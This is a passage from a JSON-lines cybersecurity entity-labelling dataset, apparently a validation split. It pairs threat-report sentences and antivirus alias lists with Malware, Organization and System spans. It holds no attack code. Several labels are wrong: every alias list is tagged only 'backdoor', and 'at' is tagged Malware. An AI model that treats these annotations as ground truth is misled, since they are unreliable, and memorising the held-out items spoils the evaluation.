HEUR:Trojan.AndroidOS.Meds.a A.H.Pay.Geimini.A Trojan:Android/MalCrypt.A Android.F369B946 AndroidOS/Geimini.B Android.Trojan.Geinimi.B Android-Trojan/Geimini.1bbc HEUR:Trojan.AndroidOS.Meds.a Trojan.AndroidOS.Geinimi Android.Trojan.Geinimi.B", "spans": {"Malware: 
backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000009", "source": "cyner2_valid"}} {"text": "While the use of document-based macros for ransomware distribution remains relatively uncommon, a new family calling itself Locky has borrowed the technique from the eminently successful Dridex to maximize its target base.", "spans": {"Malware: document-based macros": [[17, 38]], "Malware: ransomware": [[43, 53]], "Malware: Locky": [[124, 129]], "Malware: Dridex": [[187, 193]]}, "info": {"id": "cyner2_valid_000010", "source": "cyner2_valid"}} {"text": "Recently, Bleeping Computer published a short article about an unrecognized Trojan that grabs documents from the attacked computer and uploads them into a malicious server.", "spans": {"Organization: Bleeping Computer": [[10, 27]], "Malware: Trojan": [[76, 82]], "System: attacked computer": [[113, 130]], "System: malicious server.": [[155, 172]]}, "info": {"id": "cyner2_valid_000012", "source": "cyner2_valid"}} {"text": "In June 2013, McAfee published a report detailing the chronology and variance of the Dark Seoul campaign, but renamed it Operation Troy'.", "spans": {"Organization: McAfee": [[14, 20]]}, "info": {"id": "cyner2_valid_000013", "source": "cyner2_valid"}} {"text": "A backdoor also known as: BKDR_THOPER.SM Win32.Trojan.Korplug.b BKDR_THOPER.SM Trojan.Spambot.10006 TrojanDownloader:Win32/Thoper.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000015", "source": "cyner2_valid"}} {"text": "We came across the names Photo , Message , Avito Offer , and MMS Message .", "spans": {}, "info": {"id": "cyner2_valid_000016", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm.Autoit.Jenxcus.A Spyware.PasswordStealer.AI TROJ_OTOTI.SMVC W32/Trojan2.OORD TROJ_OTOTI.SMVC BehavesLike.Win32.BadFile.bh W32/Trojan.GDZY-5497 Trojan/MSIL.dcuj Trojan.Heur.AutoIT.10 Trojan:Win32/Trept.A Trojan/Win32.Autoit.C262399 Trojan.Autoit.Wirus Win32/Autoit.IV Trojan.Win32.Jorik W32/Inject.EYEW!tr", 
"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000017", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.7AA7 Trojan.Win32.Black.exryej BehavesLike.Win32.Dropper.tc Trojan.Win32.VMProtect TrojanDropper:Win32/Woozlist.B TrojanDropper.Woozlist Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000018", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TSPY_EMOTET.SML3 TSPY_EMOTET.SML3 Trojan.Win32.Inject.aidsh Trojan.Win32.Spora.eqxhdc TrojWare.Win32.Yakes.FULW Trojan.PWS.Steam.2255 BehavesLike.Win32.SoftPulse.gc W32/Trojan.SQOB-8242 Trojan.Deshacop.wg Trojan.Win32.Inject.aidsh Win32/Trojan.e36", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000019", "source": "cyner2_valid"}} {"text": "Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities.", "spans": {"Vulnerability: zero-days": [[72, 81]], "Organization: European diplomatic": [[90, 109]], "Organization: military entities.": [[114, 132]]}, "info": {"id": "cyner2_valid_000020", "source": "cyner2_valid"}} {"text": "Various recruitment posts on Chinese job sites and Chinese National Enterprise Credit Information Public System ( NECIPS ) data led us one step further , linking the actor to its legal entity name .", "spans": {"System: Chinese National Enterprise Credit Information Public System ( NECIPS )": [[51, 122]]}, "info": {"id": "cyner2_valid_000021", "source": "cyner2_valid"}} {"text": "These apps would remain available on the Play Store for months and would eventually be re-uploaded .", "spans": {"System: Play Store": [[41, 51]]}, "info": {"id": "cyner2_valid_000022", "source": "cyner2_valid"}} {"text": "In contrast to PlugX and PIVY, which are used by multiple campaigns, ChChes appears to be unique to this group.", "spans": {"Malware: PlugX": [[15, 20]], "Malware: PIVY,": [[25, 30]]}, "info": {"id": 
"cyner2_valid_000023", "source": "cyner2_valid"}} {"text": "icons Figure 11 : Icons used to pose as famous apps .", "spans": {}, "info": {"id": "cyner2_valid_000024", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass Trojan.Win32.Katusha.twgxn Trojan.DownLoader6.62288 BehavesLike.Win32.Pate.ch Packed.Katusha.arhh W32/Katusha.O Trojan.Heur2.FU.E045CE TrojanDropper:Win32/Penco.A Trojan/Win32.Penco.C241224 Win32/Trojan.a86", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000025", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.CrypticB.Trojan Virus.Win32.Virut.1!O W32.Virut.Cur1 Worm.Allaple.Win32.1 WORM_ALLAPLE.IK W32.Rahack.H WORM_ALLAPLE.IK Win.Worm.Allaple-311 Net-Worm.Win32.Allaple.e Virus.Win32.Allaple.bkbmt Worm.Win32.Allaple.e Trojan.Starman.6712 BehavesLike.Win32.RAHack.cc WORM/Allaple.gcuzf Virus/Win32.Virut.ce Worm.AllApleT.cz.67868 W32.W.Allaple.liao Net-Worm.Win32.Allaple.e OScope.Malware-Cryptor.Win32.Allaple I-Worm.Allaple Win32/Virut.NBP Net-Worm.Win32.Allaple.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000026", "source": "cyner2_valid"}} {"text": "The DroidJack RAT has been described in the past, including by Symantec and Kaspersky", "spans": {"Malware: The DroidJack RAT": [[0, 17]], "Organization: Symantec": [[63, 71]], "Organization: Kaspersky": [[76, 85]]}, "info": {"id": "cyner2_valid_000027", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.FlyStudioTn.Heur W32/Autorun.worm.ev Win32.Trojan-downloader.Flystudio.Wqwm Win32.Worm.FlyStudio.jb W32.SillyDC Win32/Nuj.GG WORM_FLYSTUDI.B Win.Worm.FlyStudio-34 Trojan-Downloader.Win32.FlyStudio.kx Trojan.Win32.FlyStudio.cgbvi Trojan.Win32.A.Downloader.200704.KB Worm.Win32.Autorun.ev4 Win32.HLLW.Autoruner.26035 Downloader.FlyStudio.Win32.2090 WORM_FLYSTUDI.B BehavesLike.Win32.Backdoor.tc Trojan.Win32.FlyStudio 
Trojan/Pakes.fsr Trojan[Downloader]/Win32.FlyStudio Win32.Troj.FakeFolderT.yo.1406378 Trojan:Win32/FlyStudio.I W32.W.FlyStudio.lgBK Trojan-Downloader.Win32.FlyStudio.kx TrojanDownloader.FlyStudio Win32/AutoRun.FlyStudio.JP Trojan.FlyStudio!vkYbijcqS0o Trj/CI.A Win32/Trojan.006", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000029", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Bancomic Trojan-Banker.Win32.BHO.wzi Virus.Banker.Delf!c TR/Bancomic.mzypo Trojan:Win32/Bancomic.A Trojan-Banker.Win32.BHO.wzi Trj/GdSda.A W32/BHO.WZI!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000030", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Flooder.36864.L Tool.NoName.Win32.5 Trojan/NoName.c Win32.Trojan.WisdomEyes.16070401.9500.9584 W32/Worm.BLCY Email-Flooder.Win32.NoName.c Trojan.Win32.NoName.dkrq Spyware.Email-Flooder.NoName.36864 Email-Flooder.W32.NoName.c!c TrojWare.Win32.Flooder.MailSpam.C FDOS.Hirr.27 Email-Flooder.Win32.Hirs W32/Worm.YISF-2950 Flooder.MailSpam.Noname.a WORM/Flood.Noname.C HackTool[Flooder]/Win32.NoName Win32.Hack.NoName.c.kcloud Email-Flooder.Win32.NoName.c Spammer:Win32/Noname.C EmailFlooder.NoName Win32/Flooder.MailSpam.NoName.C Win32.Trojan.Noname.Agkw Flooder.NoName!e3IeV2bCrgo Malware_fam.gw Win32/Trojan.Flooder.433", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000031", "source": "cyner2_valid"}} {"text": "This targeted attack was more difficult to detect because adversaries chose to leverage AutoIT, a well known freeware administration tool for automating system management in corporate environments.", "spans": {"Malware: AutoIT,": [[88, 95]], "System: freeware": [[109, 117]], "System: automating system management": [[142, 170]], "Organization: corporate environments.": [[174, 197]]}, "info": {"id": "cyner2_valid_000032", "source": "cyner2_valid"}} {"text": "Backdoor.Darpapox is a Trojan horse that opens a back door 
and steals information from the compromised computer.", "spans": {"Malware: Trojan horse": [[23, 35]], "Malware: back door": [[49, 58]], "System: compromised computer.": [[91, 112]]}, "info": {"id": "cyner2_valid_000033", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Assasin.20.C Backdoor.Assasin.20.C Backdoor.Assasin.n3 Trojan.Win32.Assasin.dbmu W32/Backdoor.WOO Backdoor.Assasin.E Win32/Assasin.D BKDR_ASSASIN20.B Backdoor.Win32.Assasin.20.c Backdoor.Assasin.20.C Backdoor.Assasin!woIJybFC2+Y Backdoor.Win32.Assasin.20.C Backdoor.Assasin.20.C Trojan.DownLoader.45490 BDS/Assasin.20.C.2 BKDR_ASSASIN20.B Backdoor/Assasin.20.c Win32.Hack.Assasin.20.kcloud Backdoor:Win32/Assasin.C Backdoor.Win32.Assasin.58880 Backdoor.Assasin.20.C W32/Backdoor.SHTQ-5952 Backdoor.Assasin.2_0 Win32/Assasin.20.C Trojan.Dwinlo!26EE Backdoor.Win32.Beastdoor W32/ASSASIN.C!tr BackDoor.Assasin.K Trj/Assasin.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000034", "source": "cyner2_valid"}} {"text": "It extracts and decrypts the stage 3 malware , which is stored in encrypted resources such as fake dialog boxes .", "spans": {}, "info": {"id": "cyner2_valid_000036", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Dropper.Zirit.A TjnDroppr.Zirit.S190393 Trojan.Dropper.Zirit.A TROJ_KRYPT.SME5 W32/Dropper.LAX Win32/Zirit.A TROJ_KRYPT.SME5 Trojan.Dropper.Zirit.A Trojan.Dropper.Zirit.A Trojan.Dropper.Zirit.A Trojan.Dropper.Zirit.A Trojan.MulDrop.14031 W32/Risk.SMOK-7332 TR/Shell.Eviell Trojan.Dropper.Zirit.A TrojanDownloader:Win32/Nonaco.J Trj/Downloader.TCC Win32/Trojan.eaa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000037", "source": "cyner2_valid"}} {"text": "This would explain the number of victims – there are less than 10 of them and according to our detection statistics , they are all located in the Russia .", "spans": {}, "info": {"id": "cyner2_valid_000038", "source": 
"cyner2_valid"}} {"text": "A backdoor also known as: TrojWare.Win32.PSW.Delf.~JHN Virus.Win32.Part.a not-a-virus:AdWare.Win32.Adstart", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000039", "source": "cyner2_valid"}} {"text": "In the past few months researchers have observed changes in the tactics, techniques, and procedures TTPs employed by TA569.", "spans": {"Organization: researchers": [[23, 34]]}, "info": {"id": "cyner2_valid_000040", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Clicker/W32.Ejik.306692.E Trojan.MotePro Adware/Ejik.ct Win32.Trojan.WisdomEyes.16070401.9500.9635 Trojan.Mdropper Win32/Jokcn.R Win.Downloader.24130-1 not-a-virus:AdWare.Win32.Ejik.ct Riskware.Win32.Ejik.rjcz AdWare.W32.Ejik.l6b1 ApplicUnwnt.Win32.Adware.Ejik.B Adware.Ejok Adware.Ejik.Win32.420 BehavesLike.Win32.HLLPPhilis.dc Virus.Win32.Baidubar TrojanDownloader.Ieser.bi GrayWare[AdWare]/Win32.Ejik Win32.Troj.RealmT.qy.kcloud Trojan.Heur.siXfrn4VKglbk not-a-virus:AdWare.Win32.Ejik.ct Adware/Win32.Ejik.R35803 BScope.Trojan.Dropper.we Win32.Adware.Ejik.Anzj", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000041", "source": "cyner2_valid"}} {"text": "A new variant of the PlugX USB worm is spreading around the world, according to security researchers at Sophos, who have been tracking the infection for several years and are warning about its potential spread.", "spans": {"Malware: the PlugX USB worm": [[17, 35]], "Organization: security researchers": [[80, 100]], "Organization: Sophos,": [[104, 111]], "Malware: infection": [[139, 148]]}, "info": {"id": "cyner2_valid_000042", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware10 Trojan-GameThief.Win32.Nilage!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Inject.crjej Backdoor.Win32.A.Inject.9728.F Backdoor.Win32.Inject.~vdr Trojan.DownLoader4.58931 Backdoor.Inject.Win32.2731 Trojan-PWS.OnlineGames_r Backdoor/Inject.awj 
Trojan.Graftor.139 Backdoor:Win32/Paras.C Backdoor/Win32.Inject.R19323 Win32/Trojan.4dd", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000043", "source": "cyner2_valid"}} {"text": "Security firm CrowdStrike has discovered the first-ever cryptojacking operation targeting Kubernetes infrastructure in the cloud, and has developed a new platform to detect and prevent such attacks, the company said.", "spans": {"Organization: Security firm CrowdStrike": [[0, 25]], "System: Kubernetes infrastructure": [[90, 115]], "System: the cloud,": [[119, 129]], "Organization: the company": [[199, 210]]}, "info": {"id": "cyner2_valid_000045", "source": "cyner2_valid"}} {"text": "Technical details show that Tordow 2.0 also collects data about device hardware and software, operating system, manufacturer, Internet Service Provider, and user location.", "spans": {"Malware: Tordow 2.0": [[28, 38]], "System: operating system,": [[94, 111]], "Organization: user": [[157, 161]]}, "info": {"id": "cyner2_valid_000046", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9758 Trojan.Win32.Banker.esracn Trojan.DownLoader25.32433 BehavesLike.Win32.Downloader.vc Trojan.Crypt.Delf.F.ED16A8F Trojan:Win32/PossibleMalware.A Trj/CI.A TrojanSpy.Banker!RkUOrI0xeHk Win32/Trojan.7ed", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000047", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDropper.Autoit Trojan.Symmi.D133F3 Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.ZODI-2280 Trojan-Dropper.Win32.Autoit.abcfby Trojan.Win32.KeyBase.evplwn Win32.Trojan-dropper.Autoit.Eanr Trojan.Nanocore.348 BehavesLike.Win32.Downloader.tc Trojan-Spy.Fareit TrojanSpy.MSIL.unu DR/Delphi.uwtlh TrojanSpy:MSIL/Yakbeex.B Trojan-Dropper.Win32.Autoit.abcfby Trojan.Hesv Trojan.Fareit Trj/CI.A Win32/Trojan.Dropper.1a6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000049", 
"source": "cyner2_valid"}} {"text": "The author of FighterPOS has either got himself or asked someone else to create a modified version to use as POS malware.", "spans": {"Malware: FighterPOS": [[14, 24]], "Malware: POS malware.": [[109, 121]]}, "info": {"id": "cyner2_valid_000052", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9953 Win32.Trojan.Spy.Pijs Trojan.MSIL.FakeTool", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000053", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PDF/Phish.CMQ PDF_MALPHISH.AUSJEQUR PDF_MALPHISH.AUSJEQUR PDF/Phish.CMQ TrojanDownloader:Win32/Pdfphish.AL Trojan.PDF.Phishing Win32/Trojan.ae7", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000054", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojandownloader.Atalo Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Trojan.JZHR-6738 W32.W.Otwycal.l4av Heur.Packed.Unknown Trojan-Downloader.Win32.Banload TrojanDownloader:Win32/Atalo.A Trj/CI.A Win32.Trojan.Crypt.Agbn W32/Banload.QZR!tr.dldr Win32/Trojan.c39", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000055", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TrotispaLTAAR.Trojan Trojan.Delf.Win32.58399 W32/Trojan.MTSS-4826 Trojan.Win32.Delf.emem Trojan.Win32.Delf.bbfwpj Win32.HLLW.Autoruner1.25150 BehavesLike.Win32.Gnamer.dc Trojan/Win32.Unknown Trojan.Heur.DP.oWWbaeCyPklc Trojan.Win32.Delf.emem Trojan.Win32.Delf W32/Delf.QWV!tr Win32/Trojan.00e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000056", "source": "cyner2_valid"}} {"text": "FrameworkPOS is a malware family that targets POS Point of Sale terminals and its main objective is to steal credit card data from them in order to be sold in the black market.", "spans": {"Malware: FrameworkPOS": [[0, 12]], "Malware: malware family": [[18, 32]], "System: POS Point of Sale terminals": 
[[46, 73]]}, "info": {"id": "cyner2_valid_000057", "source": "cyner2_valid"}} {"text": "This malware extorts a payment to prevent the attacker from spreading a victim's private information.", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "cyner2_valid_000058", "source": "cyner2_valid"}} {"text": "This can include: The keys you press The applications you open Your web browsing history Your credit card information Your user names and passwords", "spans": {}, "info": {"id": "cyner2_valid_000059", "source": "cyner2_valid"}} {"text": "] su/ChristinaMorrow hxxp : //homevideo2-12l [ .", "spans": {}, "info": {"id": "cyner2_valid_000060", "source": "cyner2_valid"}} {"text": "It turns out that this exploit sample has a far greater impact than most other traditional' memory corruption exploits targeting MS Office.", "spans": {"Malware: exploit": [[23, 30]], "Vulnerability: traditional' memory corruption": [[79, 109]], "Malware: exploits": [[110, 118]], "System: MS Office.": [[129, 139]]}, "info": {"id": "cyner2_valid_000061", "source": "cyner2_valid"}} {"text": "A Japanese one-click fraud campaign moved to iOS devices by delivering a malicious app through an adult video website and demanding a subscription fee.", "spans": {"System: iOS devices": [[45, 56]], "Malware: malicious app": [[73, 86]]}, "info": {"id": "cyner2_valid_000063", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Terror Backdoor.Terror Trojan.Bodegun.3 Backdoor.Trojan.Client Win.Trojan.Terror-5 Backdoor.Win32.Terror Trojan.Win32.Terror.bhgzo Backdoor.Win32.Terror.147456 BackDoor.Terror.10 Backdoor.Terror.Win32.2 W32/Risk.JCZW-8721 TR/Terror.Srv Trojan[Backdoor]/Win32.Terror Backdoor.W32.Terror!c Backdoor.Win32.Terror Backdoor.Terror Win32.Backdoor.Terror.Sxxr Backdoor.Terror Virus.Win32.VB W32/SennaSp.HV!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000064", "source": "cyner2_valid"}} {"text": "If the main C2 domain is not responsive , the 
bot fetches a backup C2 domain from a Twitter account .", "spans": {"Organization: Twitter": [[84, 91]]}, "info": {"id": "cyner2_valid_000065", "source": "cyner2_valid"}} {"text": "Even when this would not be directly related to the Android malware described in this blogpost , it would be an indicator of wider capabilities and objectives of this actor .", "spans": {"System: Android": [[52, 59]]}, "info": {"id": "cyner2_valid_000066", "source": "cyner2_valid"}} {"text": "Recent Team Cymru analysis of Poseidon samples revealed a number of similarities to the much-publicized Backoff POS malware family, and this post documents those similarities and a number of new IOCs.", "spans": {"Organization: Team Cymru": [[7, 17]], "Malware: Poseidon": [[30, 38]], "Malware: Backoff POS malware": [[104, 123]]}, "info": {"id": "cyner2_valid_000067", "source": "cyner2_valid"}} {"text": "This alert provides information on advanced persistent threat APT actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors.", "spans": {"Organization: government entities": [[84, 103]], "Organization: organizations": [[108, 121]], "Organization: energy, nuclear, water, aviation,": [[129, 162]], "Organization: critical manufacturing sectors.": [[167, 198]]}, "info": {"id": "cyner2_valid_000068", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.WoletixA.Trojan Win32.Trojan.WisdomEyes.16070401.9500.9844 Backdoor.Wakeminap Win.Downloader.133181-1 DLOADER.Trojan BKDR_MINIA.A W32/Trojan.GHHQ-1912 W32.Trojan.Downloader BDS/Rogue.742944 Win32/Trojan.Downloader.9df", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000069", "source": "cyner2_valid"}} {"text": "In early August, Unit 42 identified two attacks using similar techniques.", "spans": {"Organization: Unit 42": [[17, 24]]}, "info": {"id": "cyner2_valid_000071", "source": "cyner2_valid"}} {"text": "On Wednesday, Chinese iOS developers 
disclosed a new OS X and iOS malware on Sina Weibo.", "spans": {"Organization: Chinese iOS developers": [[14, 36]], "System: OS X": [[53, 57]], "Malware: iOS malware": [[62, 73]], "System: Sina Weibo.": [[77, 88]]}, "info": {"id": "cyner2_valid_000072", "source": "cyner2_valid"}} {"text": "Porn-themed malware has been hitting Android users in China, Japan, and Taiwan in recent weeks.", "spans": {"Malware: Porn-themed malware": [[0, 19]], "System: Android users": [[37, 50]]}, "info": {"id": "cyner2_valid_000073", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDropper.ExeBind.A Trojan-Dropper.Win32!O TrojanDropper.ExeBind.A Trojan.VB.Win32.134 TROJ_NETSPY.D Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.FHM TROJ_NETSPY.D Win.Trojan.Sality-1053 TrojanDropper.ExeBind Trojan-Dropper.Win32.ExeBind TrojanDropper.ExeBind.A Trojan.Win32.ExeBind.uvtd Trojan.MulDrop.2359 BehavesLike.Win32.VBObfus.bc W32/Trojan.WYJK-0766 TrojanDropper.Win32.ExeBind TR/ExeBind.1 TrojanDropper.ExeBind.A Trojan-Dropper.Win32.ExeBind TrojanDropper.ExeBind.A TrojanDropper.ExeBind.A Win32/TrojanDropper.ExeBind Trojan.VB!ONOvI8ye6cY W32/Sality.BH", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000074", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Adware.Linkun.Win32.2663 Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000075", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Win32.Trojan.WisdomEyes.16070401.9500.9879 TROJ_NITOL.SMD Trojan.DownLoader24.55929 BehavesLike.Win32.Fake.pc DDoS:Win32/Nitol.P!bit Trojan/Win32.Nitol.R215641 BScope.TrojanDDoS.Macri Trojan.ServStart", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000076", "source": "cyner2_valid"}} {"text": "The evolution of the Trojan continued as it was detailed in the post by Palo Alto Networks in June 2015, 5 and the threat intelligence briefing by ASERT6 followed in July of 
the same year.", "spans": {"Malware: Trojan": [[21, 27]], "Organization: Palo Alto Networks": [[72, 90]], "Organization: the threat intelligence": [[111, 134]], "Organization: ASERT6": [[147, 153]]}, "info": {"id": "cyner2_valid_000077", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.AutoStartup.dvlngo Uds.Dangerousobject.Multi!c Trojan.MulDrop6.16210 W32/Trojan.CDGF-3330 Trojan/Win32.AutoStartup Trojan:Win32/Simula.A Trojan.AutoStartup!UH6y6hE+p7M Hoax.Win32.BadJoke.FakeKAV Trojan.AutoStartup Trj/CI.A Win32/Trojan.6d1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000078", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.FamVT.WsysNHb.Rootkit Trojan.Winexert.S9257 Trojan.Win32.Winsecsrv TR/Crypt.Xpack.wgvpl Trojan:Win64/Winexert.C!bit PUP/Win32.LoadMoney.R176533 W64/Winsecsrv.E1!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000080", "source": "cyner2_valid"}} {"text": "Some of the checks performed previously are immediately sent to the C2 , like the safetyNet , admin and defaultSMSApp .", "spans": {}, "info": {"id": "cyner2_valid_000081", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TrojanDownloader.Delf Trojan-Downloader.Win32.Delf.bege Trojan.Win32.Delf.ecimzz Trojan.Win32.Z.Delf.92672.B Troj.Downloader.W32.Delf!c BehavesLike.Win32.Dropper.nm TrojanDownloader.Delf.aeed TR/Rogue.7605918.1 GrayWare[AdWare]/Win32.AdWeb Trojan-Downloader.Win32.Delf.bege Trojan:Win32/Sekyul.A Dropper/Win32.Xema.C156881 TScope.Trojan.Delf Win32.Trojan-downloader.Delf.Dxdn Trojan.DL.Delf!J6bXPJNe5fs Trojan.Win32.Delf W32/Delf.BEGE!tr.dldr Win32/Trojan.Downloader.e90", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000083", "source": "cyner2_valid"}} {"text": "However , there are still two issues here : The numbers to contact for cancelling the subscription are not real The billing process commences even if you don ’ t hit the “ Confirm ” 
button Even if the disclosure here displayed accurate information , the user would often find that the advertised functionality of the app did not match the actual content .", "spans": {}, "info": {"id": "cyner2_valid_000084", "source": "cyner2_valid"}} {"text": "DustySky is a campaign which others have attributed to the Gaza Cybergang group, a group that targets government interests in the region.", "spans": {"Malware: DustySky": [[0, 8]], "Organization: government": [[102, 112]]}, "info": {"id": "cyner2_valid_000085", "source": "cyner2_valid"}} {"text": "The fake doesn ’ t quite nail the app name .", "spans": {}, "info": {"id": "cyner2_valid_000086", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Graftor.D12D74 Win32.Trojan.WisdomEyes.16070401.9500.9992 Hacktool.Rootkit Win32/Agroot.C Win.Trojan.Rootkit-2779 Trojan.NtRootKit.184 W32/Trojan.TKIK-4120 Rootkit.Vanti.crd RKIT/Agony.A.5 Trojan:WinNT/Nagyo.A!rootkit TScope.Malware-Cryptor.SB Trj/CI.A Win32/Trojan.1c2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000087", "source": "cyner2_valid"}} {"text": "It uses the same technique as it used to determine the offset to the mmap function .", "spans": {}, "info": {"id": "cyner2_valid_000089", "source": "cyner2_valid"}} {"text": "Due to the urgency of this discovery, we quickly published our initial findings in order to alert the cyber security community.", "spans": {"Organization: the cyber security community.": [[98, 127]]}, "info": {"id": "cyner2_valid_000090", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Downloader.Delf.ALS Trojan-Downloader.Win32.Delf!O Backdoor.Firefly Trojan.Downloader.Delf.ALS Trojan/Downloader.Delf.als Trojan.Downloader.Delf.ALS TROJ_DELF.CDN Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Backdoor.SQAD-9325 Backdoor.Trojan TROJ_DELF.CDN Trojan.Downloader.Delf.ALS Trojan-Downloader.Win32.Delf.als Trojan.Downloader.Delf.ALS Trojan.Win32.Delf.vwqwv 
Trojan.Win32.A.Downloader.30720.JX Troj.PSW32.W.Delf.kZ37 Trojan.Downloader.Delf.ALS TrojWare.Win32.TrojanDownloader.Delf.ALS Trojan.Downloader.Delf.ALS BackDoor.FireFly Downloader.Delf.Win32.658 BehavesLike.Win32.Backdoor.nh Trojan-Downloader.Win32.Delf W32/Backdoor2.GKBN TrojanDownloader.Delf.xm Trojan[Downloader]/Win32.Delf Backdoor:Win32/Firefly.J Trojan-Downloader.Win32.Delf.als Trojan/Win32.Firefly.C880121 TrojanDownloader.Delf Trj/CI.A Win32/TrojanDownloader.Delf.ALS Win32.Trojan-downloader.Delf.Phqf Trojan.DL.Delf!jlFIlxgpj00 W32/Delf.ALS!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000091", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Clicker.cwxxrs Packed:W32/PeCan.A Trojan.Click2.42674 BehavesLike.Win32.VirRansom.fc Trojan/Win32.Unknown Trojan.Heur.EA3C51 HackTool:Win32/NKD.A Trojan/Win32.Xema.C52999 Trj/CI.A Win32/Trojan.a0b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000092", "source": "cyner2_valid"}} {"text": "Lately we informed you how a fake Dubsmash application has been uploaded to Google Play Store at least nine times, which have tens of thousands of installs.", "spans": {"System: Google Play Store": [[76, 93]], "Malware: at": [[94, 96]]}, "info": {"id": "cyner2_valid_000093", "source": "cyner2_valid"}} {"text": "Conclusion Due to the ubiquitous nature of mobile devices and the widespread use of Android , it is very easy for attackers to victimize Android users .", "spans": {"System: Android": [[84, 91], [137, 144]]}, "info": {"id": "cyner2_valid_000095", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Darkneuron.FC.3315 Troj.W32.Darkneuron!c Trojan.Cadanif Trojan.Win32.DarkNeuron.enjslz Trojan.Win32.Darkneuron TR/DarkNeuron.vyofo W32/DarkNeuron.A!tr Trojan/Win32.DarkNeuron Trojan:MSIL/DarkNeuron.B!dha Win32.Trojan.Darkneuron.Dxcr Trojan.DarkNeuron! 
